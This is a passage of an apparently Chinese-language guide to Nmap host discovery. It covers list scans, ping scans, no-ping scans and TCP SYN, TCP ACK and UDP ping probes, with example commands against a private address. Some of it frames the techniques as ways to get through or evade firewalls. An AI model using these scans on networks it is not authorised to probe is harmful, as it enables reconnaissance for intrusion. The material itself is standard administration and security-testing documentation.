ping\u7684\u7c7b\u578b)\u53ef\u4ee5\u88ab\u7ed3\u5408\u4f7f\u7528\u3002 \u60a8\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528\u4e0d\u540c\u7684TCP\u7aef\u53e3\/\u6807\u5fd7\u4f4d\u548cICMP\u7801\u53d1\u9001\u8bb8\u591a\u63a2\u6d4b\u62a5\u6587 \u6765\u589e\u52a0\u7a7f\u900f\u9632\u5b88\u4e25\u5bc6\u7684\u9632\u706b\u5899\u7684\u673a\u4f1a\u3002\u53e6\u5916\u8981\u6ce8\u610f\u7684\u662f\u5373\u4f7f\u60a8\u6307\u5b9a\u4e86\u5176\u5b83&nbsp;<code>-P<\/em><\/code>\u9009\u9879\uff0cARP\u53d1\u73b0(<code>-PR<\/code>)\u5bf9\u4e8e\u5c40\u57df\u7f51\u4e0a\u7684 \u76ee\u6807\u800c\u8a00\u662f\u9ed8\u8ba4\u884c\u4e3a\uff0c\u56e0\u4e3a\u5b83\u603b\u662f\u66f4\u5feb\u66f4\u6709\u6548\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u5217\u9009\u9879\u63a7\u5236\u4e3b\u673a\u53d1\u73b0\u3002-sL &nbsp;(\u5217\u8868\u626b\u63cf scan List)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5217\u8868\u626b\u63cf\u662f\u4e3b\u673a\u53d1\u73b0\u7684\u9000\u5316\u5f62\u5f0f\uff0c\u5b83\u4ec5\u4ec5\u5217\u51fa\u6307\u5b9a\u7f51\u7edc\u4e0a\u7684\u6bcf\u53f0\u4e3b\u673a\uff0c \u4e0d\u53d1\u9001\u4efb\u4f55\u62a5\u6587\u5230\u76ee\u6807\u4e3b\u673a\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u4ecd\u7136\u5bf9\u4e3b\u673a\u8fdb\u884c\u53cd\u5411\u57df\u540d\u89e3\u6790\u4ee5\u83b7\u53d6 \u5b83\u4eec\u7684\u540d\u5b57\u3002\u7b80\u5355\u7684\u4e3b\u673a\u540d\u80fd\u7ed9\u51fa\u7684\u6709\u7528\u4fe1\u606f\u5e38\u5e38\u4ee4\u4eba\u60ca\u8bb6\u3002\u4f8b\u5982\uff0c&nbsp;<code>fw.chi.playboy.com<\/code>\u662f\u82b1\u82b1\u516c\u5b50\u829d\u52a0\u54e5\u529e\u516c\u5ba4\u7684 \u9632\u706b\u5899\u3002Nmap\u6700\u540e\u8fd8\u4f1a\u62a5\u544aIP\u5730\u5740\u7684\u603b\u6570\u3002\u5217\u8868\u626b\u63cf\u53ef\u4ee5\u5f88\u597d\u7684\u786e\u4fdd\u60a8\u62e5\u6709\u6b63\u786e\u7684\u76ee\u6807IP\u3002 \u5982\u679c\u4e3b\u673a\u7684\u57df\u540d\u51fa\u4e4e\u60a8\u7684\u610f\u6599\uff0c\u90a3\u4e48\u5c31\u503c\u5f97\u8fdb\u4e00\u6b65\u68c0\u67e5\u4ee5\u9632\u9519\u8bef\u5730\u626b\u63cf\u5176\u5b83\u7ec4\u7ec7\u7684\u7f51\u7edc\u3002\u65e2\u7136&nbsp;<strong>-<\/strong><strong>sL\u9009\u9879&nbsp;\u53ea\u662f\u6253\u5370\u76ee\u6807\u4e3b\u673a\u7684\u5217\u8868<\/strong>\uff0c\u50cf\u5176\u5b83\u4e00\u4e9b\u9ad8\u7ea7\u529f\u80fd\u5982\u7aef\u53e3\u626b\u63cf\uff0c\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b\u6216\u8005Ping\u626b\u63cf \u7684\u9009\u9879\u5c31\u6ca1\u6709\u4e86\u3002\u5982\u679c\u60a8\u5e0c\u671b\u5173\u95edping\u626b\u63cf\u800c\u4ecd\u7136\u6267\u884c\u8fd9\u6837\u7684\u9ad8\u7ea7\u529f\u80fd\uff0c\u8bf7\u7ee7\u7eed\u9605\u8bfb\u5173\u4e8e&nbsp;<code>-P0<\/code>\u9009\u9879\u7684\u4ecb\u7ecd\u3002-sP &nbsp;(Ping\u626b\u63cf scan Ping)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8be5\u9009\u9879\u544a\u8bc9Nmap<em>\u4ec5\u4ec5<\/em>&nbsp;\u8fdb\u884cping\u626b\u63cf (\u4e3b\u673a\u53d1\u73b0)\uff0c\u7136\u540e\u6253\u5370\u51fa\u5bf9\u626b\u63cf\u505a\u51fa\u54cd\u5e94\u7684\u90a3\u4e9b\u4e3b\u673a\u3002 \u6ca1\u6709\u8fdb\u4e00\u6b65\u7684\u6d4b\u8bd5 (\u5982\u7aef\u53e3\u626b\u63cf\u6216\u8005\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b)\u3002 \u8fd9\u6bd4\u5217\u8868\u626b\u63cf\u66f4\u79ef\u6781\uff0c\u5e38\u5e38\u7528\u4e8e \u548c\u5217\u8868\u626b\u63cf\u76f8\u540c\u7684\u76ee\u7684\u3002\u5b83\u53ef\u4ee5\u5f97\u5230\u4e9b\u8bb8\u76ee\u6807\u7f51\u7edc\u7684\u4fe1\u606f\u800c\u4e0d\u88ab\u7279\u522b\u6ce8\u610f\u5230\u3002 \u5bf9\u4e8e\u653b\u51fb\u8005\u6765\u8bf4\uff0c\u4e86\u89e3\u591a\u5c11\u4e3b\u673a\u6b63\u5728\u8fd0\u884c\u6bd4\u5217\u8868\u626b\u63cf\u63d0\u4f9b\u7684\u4e00\u5217IP\u548c\u4e3b\u673a\u540d\u5f80\u5f80\u66f4\u6709\u4ef7\u503c\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7cfb\u7edf\u7ba1\u7406\u5458\u5f80\u5f80\u4e5f\u5f88\u559c\u6b22\u8fd9\u4e2a\u9009\u9879\u3002 \u5b83\u53ef\u4ee5\u5f88\u65b9\u4fbf\u5730\u5f97\u51fa \u7f51\u7edc\u4e0a\u6709\u591a\u5c11\u673a\u5668\u6b63\u5728\u8fd0\u884c\u6216\u8005\u76d1\u89c6\u670d\u52a1\u5668\u662f\u5426\u6b63\u5e38\u8fd0\u884c\u3002\u5e38\u5e38\u6709\u4eba\u79f0\u5b83\u4e3a \u5730\u6bef\u5f0fping\uff0c\u5b83\u6bd4ping\u5e7f\u64ad\u5730\u5740\u66f4\u53ef\u9760\uff0c\u56e0\u4e3a\u8bb8\u591a\u4e3b\u673a\u5bf9\u5e7f\u64ad\u8bf7\u6c42\u4e0d\u54cd\u5e94\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>-sP<\/code>\u9009\u9879\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c \u53d1\u9001\u4e00\u4e2aICMP\u56de\u58f0\u8bf7\u6c42\u548c\u4e00\u4e2aTCP\u62a5\u6587\u523080\u7aef\u53e3\u3002\u5982\u679c\u975e\u7279\u6743\u7528\u6237\u6267\u884c\uff0c\u5c31\u53d1\u9001\u4e00\u4e2aSYN\u62a5\u6587 (\u7528<code>connect()<\/code>\u7cfb\u7edf\u8c03\u7528)\u5230\u76ee\u6807\u673a\u768480\u7aef\u53e3\u3002 \u5f53\u7279\u6743\u7528\u6237\u626b\u63cf\u5c40\u57df\u7f51\u4e0a\u7684\u76ee\u6807\u673a\u65f6\uff0c\u4f1a\u53d1\u9001ARP\u8bf7\u6c42(<code>-PR<\/code>)\uff0c \uff0c\u9664\u975e\u4f7f\u7528\u4e86<code>--send-ip<\/code>\u9009\u9879\u3002&nbsp;<code>-sP<\/code>\u9009\u9879\u53ef\u4ee5\u548c\u9664<code>-P0<\/code>)\u4e4b\u5916\u7684\u4efb\u4f55\u53d1\u73b0\u63a2\u6d4b\u7c7b\u578b<code>-P*<\/code>&nbsp;\u9009\u9879\u7ed3\u5408\u4f7f\u7528\u4ee5\u8fbe\u5230\u66f4\u5927\u7684\u7075\u6d3b\u6027\u3002 \u4e00\u65e6\u4f7f\u7528\u4e86\u4efb\u4f55\u63a2\u6d4b\u7c7b\u578b\u548c\u7aef\u53e3\u9009\u9879\uff0c\u9ed8\u8ba4\u7684\u63a2\u6d4b(ACK\u548c\u56de\u5e94\u8bf7\u6c42)\u5c31\u88ab\u8986\u76d6\u4e86\u3002 \u5f53\u9632\u5b88\u4e25\u5bc6\u7684\u9632\u706b\u5899\u4f4d\u4e8e\u8fd0\u884cNmap\u7684\u6e90\u4e3b\u673a\u548c\u76ee\u6807\u7f51\u7edc\u4e4b\u95f4\u65f6\uff0c \u63a8\u8350\u4f7f\u7528\u90a3\u4e9b\u9ad8\u7ea7\u9009\u9879\u3002\u5426\u5219\uff0c\u5f53\u9632\u706b\u5899\u6355\u83b7\u5e76\u4e22\u5f03\u63a2\u6d4b\u5305\u6216\u8005\u54cd\u5e94\u5305\u65f6\uff0c\u4e00\u4e9b\u4e3b\u673a\u5c31\u4e0d\u80fd\u88ab\u63a2\u6d4b\u5230\u3002-P0 &nbsp;(\u65e0Ping) \u548c -Pn \u53c2\u6570\u6548\u679c\u4e00\u6837<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u65e0ping\u626b\u63cf\u901a\u5e38\u7528\u4e8e\u9632\u706b\u5899\u7981\u6b62ping\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\u3002\u53ef\u4ee5\u8eb2\u8fc7\u67d0\u4e9b\u9632\u706b\u5899\u7684\u9632\u62a4\u3002\u4ed6\u80fd\u786e\u5b9a\u6b63\u5728\u8fd0\u884c\u7684\u673a\u5668\u3002\u8be5\u9009\u9879\u5b8c\u5168\u8df3\u8fc7Nmap\u53d1\u73b0\u9636\u6bb5\u3002 \u901a\u5e38Nmap\u5728\u8fdb\u884c\u9ad8\u5f3a\u5ea6\u7684\u626b\u63cf\u65f6\u7528\u5b83\u786e\u5b9a\u6b63\u5728\u8fd0\u884c\u7684\u673a\u5668\u3002 \u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u53ea\u5bf9\u6b63\u5728\u8fd0\u884c\u7684\u4e3b\u673a\u8fdb\u884c\u9ad8\u5f3a\u5ea6\u7684\u63a2\u6d4b\u5982 \u7aef\u53e3\u626b\u63cf\uff0c\u7248\u672c\u63a2\u6d4b\uff0c\u6216\u8005\u64cd\u4f5c\u7cfb\u7edf\u63a2\u6d4b\u3002\u7528<code>-P0<\/code>\u7981\u6b62 \u4e3b\u673a\u53d1\u73b0\u4f1a\u4f7fNmap\u5bf9<em>\u6bcf\u4e00\u4e2a<\/em>\u6307\u5b9a\u7684\u76ee\u6807IP\u5730\u5740 \u8fdb\u884c\u6240\u8981\u6c42\u7684\u626b\u63cf\u3002\u8fd9\u53ef\u4ee5\u7a7f\u900f\u9632\u706b\u5899\u3002\u4e5f\u53ef\u4ee5\u907f\u514d\u88ab\u9632\u706b\u5899\u53d1\u73b0\u3002\u6240\u4ee5\u5982\u679c\u5728\u547d\u4ee4\u884c\u6307\u5b9a\u4e00\u4e2aB\u7c7b\u76ee\u6807\u5730\u5740\u7a7a\u95f4(\/16)\uff0c \u6240\u6709 65,536 \u4e2aIP\u5730\u5740\u90fd\u4f1a\u88ab\u626b\u63cf\u3002&nbsp;<code>-P0<\/code>\u7684\u7b2c\u4e8c\u4e2a\u5b57\u7b26\u662f\u6570\u5b570\u800c\u4e0d\u662f\u5b57\u6bcdO\u3002 \u548c\u5217\u8868\u626b\u63cf\u4e00\u6837\uff0c\u8df3\u8fc7\u6b63\u5e38\u7684\u4e3b\u673a\u53d1\u73b0\uff0c\u4f46\u4e0d\u662f\u6253\u5370\u4e00\u4e2a\u76ee\u6807\u5217\u8868\uff0c \u800c\u662f\u7ee7\u7eed\u6267\u884c\u6240\u8981\u6c42\u7684\u529f\u80fd\uff0c\u5c31\u597d\u50cf\u6bcf\u4e2aIP\u90fd\u662f\u6d3b\u52a8\u7684\u3002\u5982\u679c\u6ca1\u6709\u6307\u5b9a\u4efb\u4f55\u534f\u8bae\uff0cnmap \u9ed8\u8ba4\u4f7f\u7528\u534f\u8bae1\u3001\u534f\u8bae2\u3001\u534f\u8bae4\u3002\u5982\u679c\u60f3\u77e5\u9053\u8fd9\u4e9b\u534f\u8bae\u662f\u5982\u4f55\u5224\u65ad\u4e3b\u673a\u5b58\u6d3b\u7684\uff0c\u53ef\u4ee5\u4f7f\u7528&nbsp;--packet-trace \u9009\u9879\u3002nmap -P0 172.27.42.110&nbsp;--packet-trace \u3002nmap -P06,17,2 &nbsp;172.27.42.110 --packet-trace &nbsp;\/\/\u4f7f\u7528TCP\u3001UDP\u3001ICMP\u534f\u8bae\u60f3\u76ee\u6807\u4e3b\u673a\u53d1\u9001\u5305\uff0c\u5e76\u5224\u65ad\u4e3b\u673a\u662f\u5426\u5728\u7ebf\u3002-PS [portlist] &nbsp;(TCP SYN Ping)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u901a\u5e38\u60c5\u51b5\u4e0b\uff0cnmap \u9ed8\u8ba4ping\u626b\u63cf\u662f\u4f7f\u7528 TCP ACK \u548c ICMP Echo \u8bf7\u6c42\u5bf9\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u662f\u5426\u5b58\u6d3b\u7684\u54cd\u5e94\u3002\u5f53\u76ee\u6807\u4e3b\u673a\u9632\u706b\u5899\u963b\u6b62\u8fd9\u4e9b\u8bf7\u6c42\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528TCP SYN Ping \u626b\u63cf\u6765\u5bf9\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u5b58\u6d3b\u5224\u65ad\u3002\u8be5\u9009\u9879\u53d1\u9001\u4e00\u4e2a\u8bbe\u7f6e\u4e86SYN\u6807\u5fd7\u4f4d\u7684\u7a7aTCP\u62a5\u6587\u3002 \u9ed8\u8ba4\u76ee\u7684\u7aef\u53e3\u4e3a80 (\u53ef\u4ee5\u901a\u8fc7\u6539\u53d8<code>nmap.h<\/code>) \u6587\u4ef6\u4e2d\u7684DEFAULT-TCP-PROBE-PORT\u503c\u8fdb\u884c\u914d\u7f6e\uff0c\u4f46\u4e0d\u540c\u7684\u7aef\u53e3\u4e5f\u53ef\u4ee5\u4f5c\u4e3a\u9009\u9879\u6307\u5b9a\u3002 \u751a\u81f3\u53ef\u4ee5\u6307\u5b9a\u4e00\u4e2a\u4ee5\u9017\u53f7\u5206\u9694\u7684\u7aef\u53e3\u5217\u8868(\u5982&nbsp;<code>-PS22\uff0c23\uff0c25\uff0c80\uff0c113\uff0c1050\uff0c35000<\/code>)\uff0c \u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u6bcf\u4e2a\u7aef\u53e3\u4f1a\u88ab\u5e76\u53d1\u5730\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">SYN\u6807\u5fd7\u4f4d\u544a\u8bc9\u5bf9\u65b9\u60a8\u6b63\u8bd5\u56fe\u5efa\u7acb\u4e00\u4e2a\u8fde\u63a5\u3002 \u901a\u5e38\u76ee\u6807\u7aef\u53e3\u662f\u5173\u95ed\u7684\uff0c\u4e00\u4e2aRST (\u590d\u4f4d) \u5305\u4f1a\u53d1\u56de\u6765\u3002 \u5982\u679c\u78b0\u5de7\u7aef\u53e3\u662f\u5f00\u653e\u7684\uff0c\u76ee\u6807\u4f1a\u8fdb\u884cTCP\u4e09\u6b65\u63e1\u624b\u7684\u7b2c\u4e8c\u6b65\uff0c\u56de\u5e94 \u4e00\u4e2aSYN\/ACK TCP\u62a5\u6587\u3002\u7136\u540e\u8fd0\u884cNmap\u7684\u673a\u5668\u5219\u4f1a\u627c\u6740\u8fd9\u4e2a\u6b63\u5728\u5efa\u7acb\u7684\u8fde\u63a5\uff0c \u53d1\u9001\u4e00\u4e2aRST\u800c\u975eACK\u62a5\u6587\uff0c\u5426\u5219\uff0c\u4e00\u4e2a\u5b8c\u5168\u7684\u8fde\u63a5\u5c06\u4f1a\u5efa\u7acb\u3002 RST\u62a5\u6587\u662f\u8fd0\u884cNmap\u7684\u673a\u5668\u800c\u4e0d\u662fNmap\u672c\u8eab\u54cd\u5e94\u7684\uff0c\u56e0\u4e3a\u5b83\u5bf9\u6536\u5230 \u7684SYN\/ACK\u611f\u5230\u5f88\u610f\u5916\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u5e76\u4e0d\u5173\u5fc3\u7aef\u53e3\u5f00\u653e\u8fd8\u662f\u5173\u95ed\u3002 \u65e0\u8bbaRST\u8fd8\u662fSYN\/ACK\u54cd\u5e94\u90fd\u544a\u8bc9Nmap\u8be5\u4e3b\u673a\u6b63\u5728\u8fd0\u884c\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5728UNIX\u673a\u5668\u4e0a\uff0c\u901a\u5e38\u53ea\u6709\u7279\u6743\u7528\u6237&nbsp;<code>root<\/code>&nbsp;\u80fd\u5426\u53d1\u9001\u548c\u63a5\u6536 \u539f\u59cb\u7684TCP\u62a5\u6587\u3002\u56e0\u6b64\u4f5c\u4e3a\u4e00\u4e2a\u53d8\u901a\u7684\u65b9\u6cd5\uff0c\u5bf9\u4e8e\u975e\u7279\u6743\u7528\u6237\uff0c Nmap\u4f1a\u4e3a\u6bcf\u4e2a\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u7cfb\u7edf\u8c03\u7528connect()\uff0c\u5b83\u4e5f\u4f1a\u53d1\u9001\u4e00\u4e2aSYN \u62a5\u6587\u6765\u5c1d\u8bd5\u5efa\u7acb\u8fde\u63a5\u3002\u5982\u679cconnect()\u8fc5\u901f\u8fd4\u56de\u6210\u529f\u6216\u8005\u4e00\u4e2aECONNREFUSED \u5931\u8d25\uff0c\u4e0b\u9762\u7684TCP\u5806\u6808\u4e00\u5b9a\u5df2\u7ecf\u6536\u5230\u4e86\u4e00\u4e2aSYN\/ACK\u6216\u8005RST\uff0c\u8be5\u4e3b\u673a\u5c06\u88ab \u6807\u5fd7\u4f4d\u4e3a\u5728\u8fd0\u884c\u3002 \u5982\u679c\u8fde\u63a5\u8d85\u65f6\u4e86\uff0c\u8be5\u4e3b\u673a\u5c31\u6807\u5fd7\u4f4d\u4e3adown\u6389\u4e86\u3002\u8fd9\u79cd\u65b9\u6cd5\u4e5f\u7528\u4e8eIPv6 \u8fde\u63a5\uff0c\u56e0\u4e3aNmap\u76ee\u524d\u8fd8\u4e0d\u652f\u6301\u539f\u59cb\u7684IPv6\u62a5\u6587\u3002nmap \u662f\u7528\u8fc7SYN\/ACK \u548c RST \u54cd\u5e94\u6765\u5bf9\u76ee\u6807\u4e3b\u673a\u662f\u5426\u5b58\u6d3b\u8fdb\u884c\u5224\u65ad\uff0c\u4f46\u5728\u7279\u5b9a\u60c5\u51b5\u4e0b\u9632\u706b\u5899\u4f1a\u4e22\u5f03RST \u5305\uff0c\u8fd9\u79cd\u60c5\u51b5\u4e0b\u626b\u63cf\u7ed3\u679c\u4f1a\u4e0d\u51c6\u786e\uff0c\u8fd9\u662f\u9700\u8981\u6307\u5b9a\u7aef\u53e3\u6216\u8005\u7aef\u53e3\u7aef\u53e3\u8303\u56f4\u6765\u907f\u514d\u8fd9\u79cd\u60c5\u51b5\u3002\u793a\u4f8b\uff1anmap -PS80,100-200 -v 172.27.42.110-PA [portlist] &nbsp;(TCP ACK Ping)<\/p>\n\n\n<p class=\"wp-block-paragraph\">TCP ACK ping\u548c\u521a\u624d\u8ba8\u8bba\u7684SYN ping\u76f8\u5f53\u7c7b\u4f3c\u3002 \u4e5f\u8bb8\u60a8\u5df2\u7ecf\u731c\u5230\u4e86\uff0c\u533a\u522b\u5c31\u662f\u8bbe\u7f6eTCP\u7684ACK\u6807\u5fd7\u4f4d\u800c\u4e0d\u662fSYN\u6807\u5fd7\u4f4d\u3002 ACK\u62a5\u6587\u8868\u793a\u786e\u8ba4\u4e00\u4e2a\u5efa\u7acb\u8fde\u63a5\u7684\u5c1d\u8bd5\uff0c\u4f46\u8be5\u8fde\u63a5\u5c1a\u672a\u5b8c\u5168\u5efa\u7acb\u3002 \u6240\u4ee5\u8fdc\u7a0b\u4e3b\u673a\u5e94\u8be5\u603b\u662f\u56de\u5e94\u4e00\u4e2aRST\u62a5\u6587\uff0c \u56e0\u4e3a\u5b83\u4eec\u5e76\u6ca1\u6709\u53d1\u51fa\u8fc7\u8fde\u63a5\u8bf7\u6c42\u5230\u8fd0\u884cNmap\u7684\u673a\u5668\uff0c\u5982\u679c\u5b83\u4eec\u6b63\u5728\u8fd0\u884c\u7684\u8bdd\u3002\u4f7f\u7528\u8fd9\u79cd\u65b9\u5f0f\u53ef\u4ee5\u63a2\u6d4b\u963b\u6b62 SYN \u5305 \u548c ICMP Echo\u8bf7\u6c42\u7684\u4e3b\u673a\u3002\u5f88\u591a\u9632\u706b\u5899\u4f1a\u5c01\u9501 SYN \u62a5\u6587\uff0c\u6240\u4ee5nmap \u63d0\u4f9b\u4e86 TCP SYN Ping \u626b\u63cf\u4e0e TCP ACK Ping \u626b\u63cf\u4e24\u79cd\u63a2\u6d4b\u65b9\u5f0f\uff0c\u53ef\u4ee5\u6781\u5927\u7684\u63d0\u9ad8\u901a\u8fc7\u9632\u706b\u5899\u6982\u7387\u3002\u8fd8\u53ef\u4ee5\u540c\u4e8b\u4f7f\u7528 -PS\u4e0e-PA\u5373\u53d1\u9001SYN\u53c8\u53d1\u9001ACK<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>-PA<\/code>\u9009\u9879\u4f7f\u7528\u548cSYN\u63a2\u6d4b\u76f8\u540c\u7684\u9ed8\u8ba4\u7aef\u53e3(80)\uff0c\u4e5f\u53ef\u4ee5 \u7528\u76f8\u540c\u7684\u683c\u5f0f\u6307\u5b9a\u76ee\u6807\u7aef\u53e3\u5217\u8868\u3002\u5982\u679c\u975e\u7279\u6743\u7528\u6237\u5c1d\u8bd5\u8be5\u529f\u80fd\uff0c \u6216\u8005\u6307\u5b9a\u7684\u662fIPv6\u76ee\u6807\uff0c\u524d\u9762\u8bf4\u8fc7\u7684connect()\u65b9\u6cd5\u5c06\u88ab\u4f7f\u7528\u3002 \u8fd9\u4e2a\u65b9\u6cd5\u5e76\u4e0d\u5b8c\u7f8e\uff0c\u56e0\u4e3a\u5b83\u5b9e\u9645\u4e0a\u53d1\u9001\u7684\u662fSYN\u62a5\u6587\uff0c\u800c\u4e0d\u662fACK\u62a5\u6587\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u4f9bSYN\u548cACK\u4e24\u79cdping\u63a2\u6d4b\u7684\u539f\u56e0\u662f\u4f7f\u901a\u8fc7\u9632\u706b\u5899\u7684\u673a\u4f1a\u5c3d\u53ef\u80fd\u5927\u3002 \u8bb8\u591a\u7ba1\u7406\u5458\u4f1a\u914d\u7f6e\u4ed6\u4eec\u7684\u8def\u7531\u5668\u6216\u8005\u5176\u5b83\u7b80\u5355\u7684\u9632\u706b\u5899\u6765\u5c01\u9501SYN\u62a5\u6587\uff0c\u9664\u975e \u8fde\u63a5\u76ee\u6807\u662f\u90a3\u4e9b\u516c\u5f00\u7684\u670d\u52a1\u5668\u50cf\u516c\u53f8\u7f51\u7ad9\u6216\u8005\u90ae\u4ef6\u670d\u52a1\u5668\u3002 \u8fd9\u53ef\u4ee5\u963b\u6b62\u5176\u5b83\u8fdb\u5165\u7ec4\u7ec7\u7684\u8fde\u63a5\uff0c\u540c\u65f6\u4e5f\u5141\u8bb8\u7528\u6237\u8bbf\u95ee\u4e92\u8054\u7f51\u3002 \u8fd9\u79cd\u65e0\u72b6\u6001\u7684\u65b9\u6cd5\u51e0\u4e4e\u4e0d\u5360\u7528\u9632\u706b\u5899\/\u8def\u7531\u5668\u7684\u8d44\u6e90\uff0c\u56e0\u800c\u88ab\u786c\u4ef6\u548c\u8f6f\u4ef6\u8fc7\u6ee4\u5668 \u5e7f\u6cdb\u652f\u6301\u3002Linux Netfilter\/iptables \u9632\u706b\u5899\u8f6f\u4ef6\u63d0\u4f9b\u65b9\u4fbf\u7684&nbsp;<code>--syn<\/code>\u9009\u9879\u6765\u5b9e\u73b0\u8fd9\u79cd\u65e0\u72b6\u6001\u7684\u65b9\u6cd5\u3002 \u5f53\u8fd9\u6837\u7684\u65e0\u72b6\u6001\u9632\u706b\u5899\u89c4\u5219\u5b58\u5728\u65f6\uff0c\u53d1\u9001\u5230\u5173\u95ed\u76ee\u6807\u7aef\u53e3\u7684SYN ping\u63a2\u6d4b (<code>-PS<\/code>) \u5f88\u53ef\u80fd\u88ab\u5c01\u9501\u3002\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0cACK\u63a2\u6d4b\u683c\u5916\u6709\u95ea\u5149\u70b9\uff0c\u56e0\u4e3a\u5b83\u6b63\u597d\u5229\u7528\u4e86 \u8fd9\u6837\u7684\u89c4\u5219\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u53e6\u5916\u4e00\u79cd\u5e38\u7528\u7684\u9632\u706b\u5899\u7528\u6709\u72b6\u6001\u7684\u89c4\u5219\u6765\u5c01\u9501\u975e\u9884\u671f\u7684\u62a5\u6587\u3002 \u8fd9\u4e00\u7279\u6027\u5df2\u5f00\u59cb\u53ea\u5b58\u5728\u4e8e\u9ad8\u7aef\u9632\u706b\u5899\uff0c\u4f46\u662f\u8fd9\u4e9b\u5e74\u7c7b\u5b83\u8d8a\u6765\u8d8a\u666e\u904d\u4e86\u3002 Linux Netfilter\/iptables \u901a\u8fc7&nbsp;<code>--state<\/code>\u9009\u9879\u652f\u6301\u8fd9\u4e00\u7279\u6027\uff0c\u5b83\u6839\u636e\u8fde\u63a5\u72b6\u6001\u628a\u62a5\u6587 \u8fdb\u884c\u5206\u7c7b\u3002SYN\u63a2\u6d4b\u66f4\u6709\u53ef\u80fd\u7528\u4e8e\u8fd9\u6837\u7684\u7cfb\u7edf\uff0c\u7531\u4e8e\u6ca1\u5934\u6ca1\u8111\u7684ACK\u62a5\u6587 \u901a\u5e38\u4f1a\u88ab\u8bc6\u522b\u6210\u4f2a\u9020\u7684\u800c\u4e22\u5f03\u3002\u89e3\u51b3\u8fd9\u4e2a\u4e24\u96be\u7684\u65b9\u6cd5\u662f\u901a\u8fc7\u5373\u6307\u5b9a&nbsp;<code>-PS<\/code>\u53c8\u6307\u5b9a<code>-PA<\/code>\u6765\u5373\u53d1\u9001SYN\u53c8\u53d1\u9001ACK\u3002\u4f8b\u5b50\uff1anmap -PA -PS 172.27.42.110 -v &nbsp;\/\/ -v\u663e\u793a\u8be6\u7ec6\u4fe1\u606f\uff0c\u53ef\u4ee5\u4e0d\u52a0\uff0c\u76f4\u63a5\u770b\u7ed3\u679c-PU [portlist] &nbsp;(UDP Ping)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd8\u6709\u4e00\u4e2a\u4e3b\u673a\u53d1\u73b0\u7684\u9009\u9879\u662fUDP ping\uff0c\u5b83\u53d1\u9001\u4e00\u4e2a\u7a7a\u7684(\u9664\u975e\u6307\u5b9a\u4e86<code>--data-length<\/code>&nbsp;UDP\u62a5\u6587\u5230\u7ed9\u5b9a\u7684\u7aef\u53e3\u3002\u7aef\u53e3\u5217\u8868\u7684\u683c\u5f0f\u548c\u524d\u9762\u8ba8\u8bba\u8fc7\u7684<code>-PS<\/code>\u548c<code>-PA<\/code>\u9009\u9879\u8fd8\u662f\u4e00\u6837\u3002 \u5982\u679c\u4e0d\u6307\u5b9a\u7aef\u53e3\uff0c\u9ed8\u8ba4\u662f31338\u3002\u8be5\u9ed8\u8ba4\u503c\u53ef\u4ee5\u901a\u8fc7\u5728\u7f16\u8bd1\u65f6\u6539\u53d8<code>nmap.h<\/code>\u6587\u4ef6\u4e2d\u7684 DEFAULT-UDP-PROBE-PORT\u503c\u8fdb\u884c\u914d\u7f6e\u3002\u9ed8\u8ba4\u4f7f\u7528\u8fd9\u6837\u4e00\u4e2a\u5947\u602a\u7684\u7aef\u53e3\u662f\u56e0\u4e3a\u5bf9\u5f00\u653e\u7aef\u53e3 \u8fdb\u884c\u8fd9\u79cd\u626b\u63cf\u4e00\u822c\u90fd\u4e0d\u53d7\u6b22\u8fce\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76ee\u6807\u673a\u5668\u7684\u7aef\u53e3\u662f\u5173\u95ed\u7684\uff0cUDP\u63a2\u6d4b\u5e94\u8be5\u9a6c\u4e0a\u5f97\u5230\u4e00\u4e2aICMP\u7aef\u53e3\u65e0\u6cd5\u5230\u8fbe\u7684\u56de\u5e94\u62a5\u6587\u3002 \u8fd9\u5bf9\u4e8eNmap\u610f\u5473\u7740\u8be5\u673a\u5668\u6b63\u5728\u8fd0\u884c\u3002 \u8bb8\u591a\u5176\u5b83\u7c7b\u578b\u7684ICMP\u9519\u8bef\uff0c\u50cf\u4e3b\u673a\/\u7f51\u7edc\u65e0\u6cd5\u5230\u8fbe\u6216\u8005TTL\u8d85\u65f6\u5219\u8868\u793adown\u6389\u7684\u6216\u8005\u4e0d\u53ef\u5230\u8fbe\u7684\u4e3b\u673a\u3002 \u6ca1\u6709\u56de\u5e94\u4e5f\u88ab\u8fd9\u6837\u89e3\u91ca\u3002\u5982\u679c\u5230\u8fbe\u4e00\u4e2a\u5f00\u653e\u7684\u7aef\u53e3\uff0c\u5927\u90e8\u5206\u670d\u52a1\u4ec5\u4ec5\u5ffd\u7565\u8fd9\u4e2a \u7a7a\u62a5\u6587\u800c\u4e0d\u505a\u4efb\u4f55\u56de\u5e94\u3002\u8fd9\u5c31\u662f\u4e3a\u4ec0\u4e48\u9ed8\u8ba4\u63a2\u6d4b\u7aef\u53e3\u662f31338\u8fd9\u6837\u4e00\u4e2a 